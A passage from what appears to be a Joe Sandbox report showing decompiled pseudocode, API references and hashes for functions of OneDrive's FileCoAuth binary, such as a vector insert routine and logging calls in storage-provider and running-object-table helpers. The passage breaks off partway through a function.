    C-Code - Quality: 27%
    			E00E98B58(signed int __ecx, intOrPtr* _a4, void* _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				char _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t75;
				signed int _t80;
				signed int _t90;
				intOrPtr _t91;
				signed int _t105;
				signed int _t120;
				void* _t121;
				unsigned int _t122;
				signed int _t123;
				void* _t124;
				signed int _t125;
				signed int _t128;
				signed int _t130;
				signed int _t131;
				signed int _t133;
				char _t139;
				intOrPtr* _t140;
				intOrPtr _t144;
				intOrPtr* _t145;
				void* _t146;
				intOrPtr _t147;
				signed int _t150;
				signed int _t159;
				intOrPtr* _t162;
				signed int _t164;
				void* _t169;
				void* _t170;
				intOrPtr _t171;
				char _t173;
				unsigned int _t175;
				signed int _t176;
				signed int _t177;
				signed int _t178;

				_t75 =  *0xeb0090; // 0xbb40e64e
				_v8 = _t75 ^ _t178;
				_t153 = _a8;
				_t162 = __ecx;
				_v20 = _a4;
				_t133 = _a12;
				_v16 = __ecx;
				_v32 = _t133;
				_t80 = _t153 -  *__ecx >> 2;
				_v24 = _t153;
				_v28 = _t80;
				if(_t133 != 0) {
					_push(_t121);
					_t122 =  *(__ecx + 4);
					_push(_t170);
					_t171 =  *((intOrPtr*)(__ecx + 8));
					if(_t171 - _t122 >> 2 >= _t133) {
						L15:
						_push(_v20);
						_t173 =  *_a16;
						if(_t122 - _t153 >> 2 >= _t133) {
							_t90 = _t133 << 2;
							_t139 = _t122 - _t90;
							_v32 = _t90;
							_push(_t139);
							_push(_t139);
							_v12 = _t139;
							_t91 = E00E9906D(_t139, _t122, _t122);
							_t153 = _a8;
							_t140 = _v12;
							 *((intOrPtr*)(_t162 + 4)) = _t91;
							if(_t153 != _t140) {
								_t124 = _t122 - _t140;
								do {
									_t140 = _t140 - 4;
									 *((intOrPtr*)(_t140 + _t124)) =  *_t140;
									_t153 = _a8;
								} while (_t153 != _t140);
							}
							_t123 = _v32;
							if(_t153 != _t123 + _t153) {
								do {
									 *_t153 = _t173;
									_t153 = _t153 + 4;
								} while (_t153 != _a8 + _t123);
							}
							L27:
						} else {
							_v12 = _t173;
							_t164 = _t133 << 2;
							_push(_t133);
							_push(_t133);
							E00E9906D(_v24, _t122, _t164 + _t153);
							_t125 = _v16;
							_push(_v20);
							_t144 =  *((intOrPtr*)(_t125 + 4));
							_push(_t144);
							_push(_t144);
							E00E98F37(_t144, _v32 - (_t144 - _a8 >> 2),  &_v12);
							 *((intOrPtr*)(_t125 + 4)) =  *((intOrPtr*)(_t125 + 4)) + _t164;
							_t153 = 0;
							_t145 = _a8;
							_t169 =  >  ? 0 :  *((intOrPtr*)(_t125 + 4)) - _t164 - _t145 + 3 >> 2;
							if(_t169 != 0) {
								do {
									_t153 = _t153 + 1;
									 *_t145 = _t173;
									_t145 = _t145 + 4;
								} while (_t153 != _t169);
							}
							_t162 = _v16;
						}
					} else {
						_t128 = _t122 -  *__ecx >> 2;
						if(0x3fffffff - _t128 < _t133) {
							__imp__?_Xlength_error@std@@YAXPBD@Z("vector<T> too long");
						}
						_t105 = _t128 + _t133;
						_t175 = _t171 -  *_t162 >> 2;
						_t133 = 0;
						_v24 = _t105;
						_t122 = _t175 >> 1;
						_v16 = 0;
						if(0x3fffffff - _t122 >= _t175) {
							_t176 = _t175 + _t122;
						} else {
							_t176 = 0;
						}
						_t177 =  <  ? _v24 : _t176;
						if(_t177 == 0) {
							L11:
							_push(_v20);
							_t130 = _v32;
							_t159 = _t153 -  *_t162 >> 2;
							_push(_t133);
							_push(_t133);
							_v24 = _t159;
							_t146 = _t133 + _t159 * 4;
							E00E98F37(_t146, _t130, _a16);
							_push(_v20);
							_push(_t146);
							_push(_t146);
							_t147 =  *_t162;
							E00E9906D(_t147, _a8, _v16);
							_push(_v20);
							_t153 =  *((intOrPtr*)(_t162 + 4));
							_push(_t147);
							_push(_t147);
							E00E9906D(_a8,  *((intOrPtr*)(_t162 + 4)), _v16 + (_v24 + _t130) * 4);
							_t131 = _t130 + ( *((intOrPtr*)(_t162 + 4)) -  *_t162 >> 2);
							if( *_t162 != 0) {
								__imp__??3@YAXPAX@Z( *_t162);
							}
							_t150 = _v16;
							 *_t162 = _t150;
							 *((intOrPtr*)(_t162 + 8)) = _t150 + _t177 * 4;
							 *((intOrPtr*)(_t162 + 4)) = _t150 + _t131 * 4;
						} else {
							if(_t177 > 0x3fffffff) {
								L14:
								__imp__?_Xbad_alloc@std@@YAXXZ();
								goto L15;
							} else {
								_t120 = _t177 << 2;
								__imp__??2@YAPAXI@Z(_t120);
								_t133 = _t120;
								_v16 = _t133;
								if(_t133 == 0) {
									goto L14;
								} else {
									_t153 = _a8;
									goto L11;
								}
							}
						}
					}
					_t80 = _v28;
					_pop(_t170);
					_pop(_t121);
				}
				 *_v20 =  *_t162 + _t80 * 4;
				return E00EA29F2(_t121, _v8 ^ _t178, _t153, _t162, _t170);
				goto L27;
			}














































    0x00e98b60
    0x00e98b67
    0x00e98b6d
    0x00e98b71
    0x00e98b73
    0x00e98b76
    0x00e98b7b
    0x00e98b7e
    0x00e98b83
    0x00e98b86
    0x00e98b89
    0x00e98b8e
    0x00e98b94
    0x00e98b95
    0x00e98b98
    0x00e98b99
    0x00e98ba5
    0x00e98c9a
    0x00e98c9f
    0x00e98ca7
    0x00e98cab
    0x00e98d3d
    0x00e98d42
    0x00e98d44
    0x00e98d47
    0x00e98d48
    0x00e98d4a
    0x00e98d4d
    0x00e98d52
    0x00e98d55
    0x00e98d58
    0x00e98d5d
    0x00e98d5f
    0x00e98d61
    0x00e98d61
    0x00e98d66
    0x00e98d69
    0x00e98d6c
    0x00e98d61
    0x00e98d70
    0x00e98d78
    0x00e98d7a
    0x00e98d7a
    0x00e98d7c
    0x00e98d84
    0x00e98d88
    0x00000000
    0x00e98cb1
    0x00e98cb3
    0x00e98cb6
    0x00e98cb9
    0x00e98cba
    0x00e98cc4
    0x00e98cc9
    0x00e98ccf
    0x00e98cd5
    0x00e98cd8
    0x00e98cd9
    0x00e98ce5
    0x00e98cea
    0x00e98ced
    0x00e98cf4
    0x00e98d05
    0x00e98d0a
    0x00e98d0c
    0x00e98d0c
    0x00e98d0d
    0x00e98d0f
    0x00e98d12
    0x00e98d0c
    0x00e98d16
    0x00e98d16
    0x00e98bab
    0x00e98bb2
    0x00e98bb9
    0x00e98bc0
    0x00e98bc0
    0x00e98bc8
    0x00e98bcb
    0x00e98bce
    0x00e98bd0
    0x00e98bd5
    0x00e98bde
    0x00e98be3
    0x00e98be9
    0x00e98be5
    0x00e98be5
    0x00e98be5
    0x00e98bee
    0x00e98bf4
    0x00e98c1b
    0x00e98c1b
    0x00e98c20
    0x00e98c23
    0x00e98c26
    0x00e98c27
    0x00e98c2b
    0x00e98c2e
    0x00e98c33
    0x00e98c38
    0x00e98c3e
    0x00e98c3f
    0x00e98c43
    0x00e98c45
    0x00e98c4a
    0x00e98c50
    0x00e98c55
    0x00e98c56
    0x00e98c61
    0x00e98c6e
    0x00e98c73
    0x00e98c77
    0x00e98c7d
    0x00e98c7e
    0x00e98c81
    0x00e98c86
    0x00e98c8c
    0x00e98bf6
    0x00e98bfc
    0x00e98c94
    0x00e98c94
    0x00000000
    0x00e98c02
    0x00e98c04
    0x00e98c08
    0x00e98c0f
    0x00e98c11
    0x00e98c16
    0x00000000
    0x00e98c18
    0x00e98c18
    0x00000000
    0x00e98c18
    0x00e98c16
    0x00e98bfc
    0x00e98bf4
    0x00e98d19
    0x00e98d1c
    0x00e98d1d
    0x00e98d1d
    0x00e98d27
    0x00e98d36
    0x00000000

    APIs
    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(vector<T> too long,00EB23A0,?,?,?,?,00E98F1B,?,?,00EB23A0,?,BB40E64E), ref: 00E98BC0
    • ??2@YAPAXI@Z.MSVCR120 ref: 00E98C08
    • ??3@YAXPAX@Z.MSVCR120 ref: 00E98C77
    • ?_Xbad_alloc@std@@YAXXZ.MSVCP120(00EB23A0,?,?,?,?,00E98F1B,?,?,00EB23A0,?,BB40E64E), ref: 00E98C94
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: ??2@??3@Xbad_alloc@std@@Xlength_error@std@@
    • String ID: vector<T> too long
    • API String ID: 61914137-3788999226
    • Opcode ID: 5e1dd2016b379d1060496ef5b39997704fe14155d91e87820b4ac595ef2e7203
    • Instruction ID: 9008eaa541dc172509e6cbda5511f7349acdde6f942f3d7f55e3bdef7f94b9c5
    • Opcode Fuzzy Hash: 5e1dd2016b379d1060496ef5b39997704fe14155d91e87820b4ac595ef2e7203
    • Instruction Fuzzy Hash: 5E814EB5E0011AAFCF18CF68C9848AEB7B5FF59314B24862DE815E7355DB31AD11CB50
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E9CFC5, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 105COMMON
    Download Yara Rule
    C-Code - Quality: 81%
    			E00E9CFC5(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t56;
				void* _t60;
				void* _t65;
				signed int _t71;
				intOrPtr _t91;
				intOrPtr _t93;
				intOrPtr* _t94;
				intOrPtr _t95;
				void* _t96;

				E00EA3194(E00EA47C5, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t96 - 0x17c)) = __ecx;
				_t91 =  *((intOrPtr*)(_t96 + 8));
				_t93 = __ecx + 0x40;
				 *((intOrPtr*)(_t96 - 0x180)) = _t93;
				__imp___Mtx_lock(_t93, 0x20c);
				E00E9E349(__ecx);
				 *(_t96 - 4) = 0;
				 *((intOrPtr*)(_t96 - 0x18)) = 0;
				_t71 = 1;
				 *((intOrPtr*)(_t96 - 0x14)) = 0;
				 *((intOrPtr*)(_t96 - 0x14)) = 7;
				 *((intOrPtr*)(_t96 - 0x18)) = 0;
				 *((short*)(_t96 - 0x28)) = 0;
				 *(_t96 - 4) = 1;
				_t94 =  *((intOrPtr*)(_t96 - 0x17c));
				do {
					E00E97773(_t71, _t96 - 0x218, _t91, _t94, 1);
					 *(_t96 - 4) = 2;
					E00E97EF0(_t71, _t91, _t94, 1);
					__imp__??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV01@I@Z(_t96 - 0x218, L"Business", _t71, 2, 1);
					E00E953DD(_t96 - 0x174, _t91, _t94, 1);
					 *(_t96 - 4) = 3;
					_t56 = E00E9817A(_t96 - 0x218, _t96 - 0x40);
					 *(_t96 - 4) = 4;
					 *((char*)(_t96 - 0x175)) =  *((intOrPtr*)( *_t94 + 0x14))(_t56, _t96 - 0x174);
					 *(_t96 - 4) = 3;
					E00E94307(_t96 - 0x40, 1, 0);
					if( *((char*)(_t96 - 0x175)) == 0 ||  *((char*)(_t96 - 0xf8)) == 0) {
						 *((char*)(_t96 - 0x175)) = 0;
						_t60 = E00E9817A(_t96 - 0x218, _t96 - 0x58);
						 *(_t96 - 4) = 5;
						E00E990AD(_t96 - 0x28, _t60);
						 *(_t96 - 4) = 3;
						E00E94307(_t96 - 0x58, 1, 0);
					}
					_t71 = _t71 + 1;
					 *(_t96 - 4) = 2;
					E00E94681(_t96 - 0x174);
					 *(_t96 - 4) = 1;
					E00E97E2A();
				} while ( *((char*)(_t96 - 0x175)) != 0);
				_t95 =  *((intOrPtr*)(_t96 - 0x180));
				_t64 = _t96 - 0x28;
				if(_t91 != _t96 - 0x28) {
					E00E94BDD(_t91, _t64, 0, 0xffffffff);
				}
				 *(_t96 - 4) = 0;
				_t65 = E00E94307(_t96 - 0x28, 1, 0);
				 *(_t96 - 4) =  *(_t96 - 4) | 0xffffffff;
				__imp___Mtx_unlock(_t95);
				E00E9E349(_t65);
				return E00EA3152(_t71, _t91, _t95);
			}












    0x00e9cfcf
    0x00e9cfd6
    0x00e9cfdc
    0x00e9cfdf
    0x00e9cfe3
    0x00e9cfe9
    0x00e9cff1
    0x00e9cff8
    0x00e9cffd
    0x00e9d000
    0x00e9d001
    0x00e9d004
    0x00e9d00b
    0x00e9d00e
    0x00e9d012
    0x00e9d015
    0x00e9d01b
    0x00e9d025
    0x00e9d02a
    0x00e9d03b
    0x00e9d042
    0x00e9d04e
    0x00e9d053
    0x00e9d061
    0x00e9d066
    0x00e9d079
    0x00e9d07f
    0x00e9d08a
    0x00e9d096
    0x00e9d0a4
    0x00e9d0b2
    0x00e9d0b7
    0x00e9d0bf
    0x00e9d0c4
    0x00e9d0cf
    0x00e9d0cf
    0x00e9d0d4
    0x00e9d0d5
    0x00e9d0df
    0x00e9d0e4
    0x00e9d0ee
    0x00e9d0f3
    0x00e9d100
    0x00e9d106
    0x00e9d10b
    0x00e9d114
    0x00e9d114
    0x00e9d119
    0x00e9d124
    0x00e9d129
    0x00e9d12e
    0x00e9d136
    0x00e9d140

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00E9CFCF
    • _Mtx_lock.MSVCP120(?,0000020C), ref: 00E9CFE9
      • Part of subcall function 00E9E349: ?_Throw_C_error@std@@YAXH@Z.MSVCP120(00000000,?,00E9BECC,00000000,00000004,00E9BE52), ref: 00E9E357
      • Part of subcall function 00E97773: __EH_prolog3.LIBCMT ref: 00E9777A
      • Part of subcall function 00E97773: ??0?$basic_ios@_WU?$char_traits@_W@std@@@std@@IAE@XZ.MSVCP120(00000008,00E9833E,00000002,00000001), ref: 00E97797
      • Part of subcall function 00E97773: ??0?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAE@PAV?$basic_streambuf@_WU?$char_traits@_W@std@@@1@_N@Z.MSVCP120(?,00000000,00000000,00000008,00E9833E,00000002,00000001), ref: 00E977AF
      • Part of subcall function 00E97EF0: __EH_prolog3_catch.LIBCMT ref: 00E97EF7
      • Part of subcall function 00E97EF0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00E98084
    • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,Business,00000001,00000002,00000001,?,?,?,?,?,00000000), ref: 00E9D042
      • Part of subcall function 00E953DD: __EH_prolog3.LIBCMT ref: 00E953E4
      • Part of subcall function 00E94307: ??3@YAXPAX@Z.MSVCR120 ref: 00E94332
    • _Mtx_unlock.MSVCP120(00000000,00000001,00000000,00000001,00000000,00000000,?), ref: 00E9D12E
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: U?$char_traits@_$W@std@@@std@@$H_prolog3$??0?$basic_ios@_??0?$basic_ostream@_??3@??6?$basic_ostream@_?setstate@?$basic_ios@_C_error@std@@H_prolog3_H_prolog3_catchMtx_lockMtx_unlockThrow_V01@V?$basic_streambuf@_W@std@@@1@_
    • String ID: Business
    • API String ID: 358461171-4054125678
    • Opcode ID: 118a776a5d451a96dda8970cd63acda2731080c8b613464d50ba6318489a524e
    • Instruction ID: 7cedc73b54c32289bf241ff4b8e86e8c08fc5e54a7e1fc91cd1a61c8826646d0
    • Opcode Fuzzy Hash: 118a776a5d451a96dda8970cd63acda2731080c8b613464d50ba6318489a524e
    • Instruction Fuzzy Hash: A2419E70805298EEDF11DBA4CC4ABDDBBB4AF15304F1451C8E149B71D2DBB01B89CB92
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E94896, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 95COMMON
    Download Yara Rule
    C-Code - Quality: 60%
    			E00E94896(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t33;
				signed int* _t41;
				signed int _t44;
				intOrPtr* _t51;
				signed int _t53;
				void* _t54;

				_t52 = __esi;
				_push(0xc);
				E00EA3194(E00EA3822, __ebx, __edi, __esi);
				_t41 =  *(_t54 + 0xc);
				_t51 =  *((intOrPtr*)(_t54 + 8));
				if(_t41 != 0) {
					 *(_t54 - 0x18) =  *(_t54 - 0x18) & 0x00000000;
					 *(_t54 - 4) =  *(_t54 - 4) & 0x00000000;
					_t43 =  *(__ecx + 4);
					_t53 = E00E954D0( *(__ecx + 4), __eflags, _t51, _t54 - 0x18);
					__eflags = _t53;
					if(_t53 < 0) {
						__eflags = _t53 - 0x800401e3;
						if(_t53 != 0x800401e3) {
							__eflags = _t53 - 0x8000ffff;
							_t52 =  ==  ? 0x80040b05 : _t53;
						} else {
							_t52 = 0x80040b04;
						}
						L18:
						__eflags =  *((intOrPtr*)(_t51 + 0x14)) - 8;
						if( *((intOrPtr*)(_t51 + 0x14)) >= 8) {
							_t51 =  *_t51;
						}
						E00E94488(_t43, _t51, _t52);
						 *(_t54 - 4) =  *(_t54 - 4) | 0xffffffff;
						_t44 =  *(_t54 - 0x18);
						__eflags = _t44;
						if(_t44 != 0) {
							 *((intOrPtr*)( *_t44 + 8))(_t44);
						}
						goto L23;
					}
					_t33 =  *(_t54 - 0x18);
					_t43 = 0;
					 *(_t54 - 0x14) = 0;
					__eflags = _t33;
					if(_t33 != 0) {
						__eflags =  *((intOrPtr*)( *_t33))(_t33, 0xea7578, _t54 - 0x14);
						_t43 =  <  ? 0 :  *(_t54 - 0x14);
						 *(_t54 - 0x14) = _t43;
					}
					 *(_t54 - 4) = 1;
					__eflags = _t53;
					if(_t53 != 0) {
						__eflags = _t53 - 1;
						if(_t53 == 1) {
							L12:
							_t52 = 0x80040b02;
							goto L13;
						}
						__eflags = _t43;
						if(_t43 == 0) {
							goto L12;
						}
						goto L11;
					} else {
						__eflags = _t43;
						if(_t43 != 0) {
							L11:
							 *_t41 = _t43;
							 *((intOrPtr*)( *_t43 + 4))(_t43);
							_t52 = 0;
							L8:
							_t43 =  *(_t54 - 0x14);
							L13:
							 *(_t54 - 4) = 0;
							__eflags = _t43;
							if(_t43 != 0) {
								 *((intOrPtr*)( *_t43 + 8))(_t43);
							}
							goto L18;
						}
						__imp__?LoggingWriteStructuredEvent@@YGXPBDI0ABU_GUID@@IIIQAUStructuredEventParameter@@@Z("d:\\dbs\\sh\\odib\\0313_155253\\cmd\\24\\client\\onedrive\\product\\filecoauth\\filecoauth\\storageproviderfinder.cpp", 0x7a, "StorageProviderFinder::GetStorageProviderFromRot", 0xea7810, 0xf4affc1d, 1, _t43, _t43);
						__imp__?LoggingRotateIfNeeded@@YGXXZ();
						_t52 = 0x80040b01;
						goto L8;
					}
				} else {
					L23:
					return E00EA3152(_t41, _t51, _t52);
				}
			}









    0x00e94896
    0x00e94896
    0x00e9489d
    0x00e948a2
    0x00e948a5
    0x00e948aa
    0x00e948b6
    0x00e948ba
    0x00e948c1
    0x00e948cb
    0x00e948cd
    0x00e948cf
    0x00e94962
    0x00e94968
    0x00e94971
    0x00e9497c
    0x00e9496a
    0x00e9496a
    0x00e9496a
    0x00e9497f
    0x00e9497f
    0x00e94983
    0x00e94985
    0x00e94985
    0x00e9498a
    0x00e9498f
    0x00e94993
    0x00e94996
    0x00e94998
    0x00e9499d
    0x00e9499d
    0x00000000
    0x00e949a0
    0x00e948d5
    0x00e948d8
    0x00e948da
    0x00e948dd
    0x00e948df
    0x00e948f4
    0x00e948f6
    0x00e948f9
    0x00e948f9
    0x00e948fc
    0x00e94900
    0x00e94902
    0x00e94938
    0x00e9493b
    0x00e9494d
    0x00e9494d
    0x00000000
    0x00e9494d
    0x00e9493d
    0x00e9493f
    0x00000000
    0x00000000
    0x00000000
    0x00e94904
    0x00e94904
    0x00e94906
    0x00e94941
    0x00e94941
    0x00e94946
    0x00e94949
    0x00e94933
    0x00e94933
    0x00e94952
    0x00e94952
    0x00e94956
    0x00e94958
    0x00e9495d
    0x00e9495d
    0x00000000
    0x00e94958
    0x00e94922
    0x00e94928
    0x00e9492e
    0x00000000
    0x00e9492e
    0x00e948ac
    0x00e949a2
    0x00e949a7
    0x00e949a7

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00E9489D
    • ?LoggingWriteStructuredEvent@@YGXPBDI0ABU_GUID@@IIIQAUStructuredEventParameter@@@Z.LOGGINGPLATFORM(d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\storageproviderfinder.cpp,0000007A,StorageProviderFinder::GetStorageProviderFromRot,00EA7810,F4AFFC1D,00000001,00000000,00000000,?,?,?,?,?,?,0000000C), ref: 00E94922
    • ?LoggingRotateIfNeeded@@YGXXZ.LOGGINGPLATFORM(?,?,?,?,?,?,0000000C), ref: 00E94928
    Strings
    • d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\storageproviderfinder.cpp, xrefs: 00E9491D
    • StorageProviderFinder::GetStorageProviderFromRot, xrefs: 00E94916
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: LoggingStructured$EventEvent@@H_prolog3_Needed@@Parameter@@@RotateWrite
    • String ID: StorageProviderFinder::GetStorageProviderFromRot$d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\storageproviderfinder.cpp
    • API String ID: 1253850681-509154929
    • Opcode ID: bdb0aab5c24ba3b6a12ec80976e8bfb1469cc751f0e631a27dd3ca8e716c4aac
    • Instruction ID: 3326dcf1952dab54fc1d2c83b66780168616b99d71469f64f491decefc82b7c0
    • Opcode Fuzzy Hash: bdb0aab5c24ba3b6a12ec80976e8bfb1469cc751f0e631a27dd3ca8e716c4aac
    • Instruction Fuzzy Hash: 7A31C2B0A142179BDF28DB64C849E6FB764AF9A319F25516CF841BB290C734AE01C791
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E955FD, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 80COMMON
    Download Yara Rule
    C-Code - Quality: 72%
    			E00E955FD(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t31;
				void* _t38;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				intOrPtr* _t52;
				signed int _t53;
				void* _t61;
				intOrPtr* _t63;
				void* _t69;
				void* _t70;

				_t70 = __eflags;
				_push(0x54);
				E00EA3194(E00EA399C, __ebx, __edi, __esi);
				_t63 = __ecx;
				_t48 = _t69 - 0x30;
				_t46 =  *((intOrPtr*)(_t69 + 0xc));
				 *((intOrPtr*)(_t69 - 0x30)) = 0;
				E00E9851B(_t48, "RunningObjectTableHelper::CreateMoniker");
				_push(_t48);
				 *((intOrPtr*)(_t69 - 4)) = 0;
				_t31 = E00E956FA(_t46, _t69 - 0x60,  *((intOrPtr*)(_t69 + 8)), __ecx,  *((intOrPtr*)(_t69 + 8)), _t70);
				 *((char*)(_t69 - 4)) = 1;
				E00E95758(_t69 - 0x60, _t69 - 0x48, _t31, E00E987B8(_t46, _t69 - 0x60,  *((intOrPtr*)(_t69 + 8)), _t63, _t31, _t70));
				 *((char*)(_t69 - 4)) = 3;
				E00E94307(_t69 - 0x60, 1, 0);
				 *(_t69 - 0x28) = "monikerName";
				_t52 =  >=  ?  *((void*)(_t69 - 0x48)) : _t69 - 0x48;
				 *((intOrPtr*)(_t69 - 0x2c)) = 1;
				 *((intOrPtr*)(_t69 - 0x24)) = _t52;
				if(_t52 == 0) {
					_t53 = 0;
				} else {
					_t17 = _t52 + 2; // 0x3
					_t61 = _t17;
					do {
						_t44 =  *_t52;
						_t52 = _t52 + 2;
					} while (_t44 != 0);
					_t53 = _t52 - _t61 >> 1;
				}
				 *(_t69 - 0x1c) = _t53;
				__imp__?LoggingWriteStructuredEvent@@YGXPBDI0ABU_GUID@@IIIQAUStructuredEventParameter@@@Z("d:\\dbs\\sh\\odib\\0313_155253\\cmd\\17\\client\\onedrive\\product\\ux\\shared\\runningobjecttablehelper.cpp", 0x7b, "RunningObjectTableHelper::CreateMoniker", 0xea7d10, 0x4664ad81, 1, 1, _t69 - 0x2c);
				__imp__?LoggingRotateIfNeeded@@YGXXZ();
				_t60 =  >=  ?  *((void*)(_t69 - 0x48)) : _t69 - 0x48;
				_t38 =  *((intOrPtr*)( *_t63 + 0x260))(0xea7684,  >=  ?  *((void*)(_t69 - 0x48)) : _t69 - 0x48, _t46);
				E00E94307(_t69 - 0x48, 1, 0);
				E00E98588();
				return E00EA3152(_t46, _t63, _t38);
			}














    0x00e955fd
    0x00e955fd
    0x00e95604
    0x00e95609
    0x00e9560e
    0x00e95611
    0x00e9561b
    0x00e9561e
    0x00e95627
    0x00e9562b
    0x00e9562e
    0x00e95635
    0x00e95644
    0x00e9564b
    0x00e95655
    0x00e95661
    0x00e95668
    0x00e9566c
    0x00e95673
    0x00e95678
    0x00e9568e
    0x00e9567a
    0x00e9567a
    0x00e9567a
    0x00e9567d
    0x00e9567d
    0x00e95680
    0x00e95683
    0x00e9568a
    0x00e9568a
    0x00e95693
    0x00e956b1
    0x00e956b7
    0x00e956c8
    0x00e956d3
    0x00e956e3
    0x00e956eb
    0x00e956f7

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00E95604
      • Part of subcall function 00E956FA: __EH_prolog3.LIBCMT ref: 00E95701
      • Part of subcall function 00E987B8: __EH_prolog3_GS.LIBCMT ref: 00E987BF
      • Part of subcall function 00E94307: ??3@YAXPAX@Z.MSVCR120 ref: 00E94332
    • ?LoggingWriteStructuredEvent@@YGXPBDI0ABU_GUID@@IIIQAUStructuredEventParameter@@@Z.LOGGINGPLATFORM(d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\runningobjecttablehelper.cpp,0000007B,RunningObjectTableHelper::CreateMoniker,00EA7D10,4664AD81,00000001,00000001,00000001,00000001,00000000,00000001,00000000,00000000,?,RunningObjectTableHelper::CreateMoniker,00000054), ref: 00E956B1
    • ?LoggingRotateIfNeeded@@YGXXZ.LOGGINGPLATFORM(?,RunningObjectTableHelper::CreateMoniker,00000054,00E95540,?,00000000,?,?,?,?,RunningObjectTableHelper::GetObjectW), ref: 00E956B7
    Strings
    • RunningObjectTableHelper::CreateMoniker, xrefs: 00E95616, 00E956A5
    • d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\runningobjecttablehelper.cpp, xrefs: 00E956AC
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: H_prolog3_LoggingStructured$??3@EventEvent@@H_prolog3Needed@@Parameter@@@RotateWrite
    • String ID: RunningObjectTableHelper::CreateMoniker$d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\runningobjecttablehelper.cpp
    • API String ID: 448590175-2618668510
    • Opcode ID: 40bfafd37cb1d99bbf9cf1cbe4ab4a8b70cb279b325cdc3d7907199709c0faff
    • Instruction ID: fdf30cd6d21b74dfd208214fb0980d7a2720430ddefb31e8df8aeb04724797a5
    • Opcode Fuzzy Hash: 40bfafd37cb1d99bbf9cf1cbe4ab4a8b70cb279b325cdc3d7907199709c0faff
    • Instruction Fuzzy Hash: 2331BF71A01308AFDF04DBA4CC95AEEBBB5EF4D710F545418F801BB281DB706A46CB50
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E9AEAD, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74COMMON
    Download Yara Rule
    C-Code - Quality: 71%
    			E00E9AEAD(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr* _a4, char _a8, intOrPtr* _a12, char _a16, intOrPtr* _a20, intOrPtr* _a32) {
				signed int _v4;
				intOrPtr _t60;
				intOrPtr* _t62;
				intOrPtr _t63;
				intOrPtr* _t64;
				intOrPtr* _t82;
				void* _t86;
				void* _t90;
				intOrPtr* _t91;
				intOrPtr* _t93;
				intOrPtr _t94;
				intOrPtr _t95;
				intOrPtr _t96;
				intOrPtr* _t101;
				intOrPtr* _t105;
				void* _t106;
				intOrPtr* _t107;
				char _t110;
